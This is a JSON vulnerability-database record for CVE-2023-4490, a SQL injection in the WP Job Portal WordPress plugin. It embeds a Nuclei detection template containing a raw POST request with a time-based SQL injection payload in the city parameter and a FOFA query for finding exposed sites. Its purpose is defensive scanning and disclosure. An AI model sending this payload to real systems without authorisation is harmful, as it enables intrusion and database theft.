{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-4490/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-4490/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-4490/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-4490/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-4490/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-4490"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-4490"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-4490.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2023-4490\n\ninfo:\n  name: WordPress Job Portal < 2.0.6 - SQL Injection\n  author: paresh_parmar1,Configtea\n  severity: high\n  description: |\n    The WP Job Portal WordPress plugin before 2.0.6 does not sanitise and escape the city parameter before using it in a SQL statement,leading to a SQL injection vulnerability that is exploitable by unauthenticated users. This vulnerability can be used to extractsensitive data from the database or potentially compromise the WordPress installation.\n  impact: |\n    Unauthenticated attackers can execute SQL injection through the city parameter to extract the complete WordPress database including user credentials and job portal data.\n  remediation: Update to version 2.0.6 or later\n  reference:\n    - https://wpscan.com/vulnerability/986024f0-3c8d-44d8-a9c9-1dd284d7db0d/\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-4490\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 8.6\n    cwe-id: CWE-89\n    epss-score: 0.03122\n    epss-percentile: 0.87299\n    cve-id: CVE-2023-4490\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"/wp-content/plugins/wp-job-portal\"\n  tags: cve,cve2023,sqli,wp,wordpress,wp-plugin,wp-job-portal,time-based-sqli,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 25s\n        POST /wp-job-portal-jobseeker-controlpanel/jobs HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        jobtitle=aaaa&salarytype=&salaryfixed=&salarymin=&salarymax=&salaryduration=2&duration=&city=(select*from(select(sleep(7)))a)&metakeywords=&save=Search+Job&default_longitude=71.2577233&default_latitude=29.1411551&issearchform=1&WPJOBPORTAL_form_search=WPJOBPORTAL_SEARCH&wpjobportallay=jobs\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration >= 7'\n          - 'contains(body, \"wp-content/plugins/wp-job-portal\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100e6f38f671a2e4cc1762326d5c1bbb2e62691b1d3ee24dd406e4f1f41d13e7050022100844fd041541fd6addde3cde9db67777b7d2f36b39e96e4e3290fd497139d222f:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-4490"
}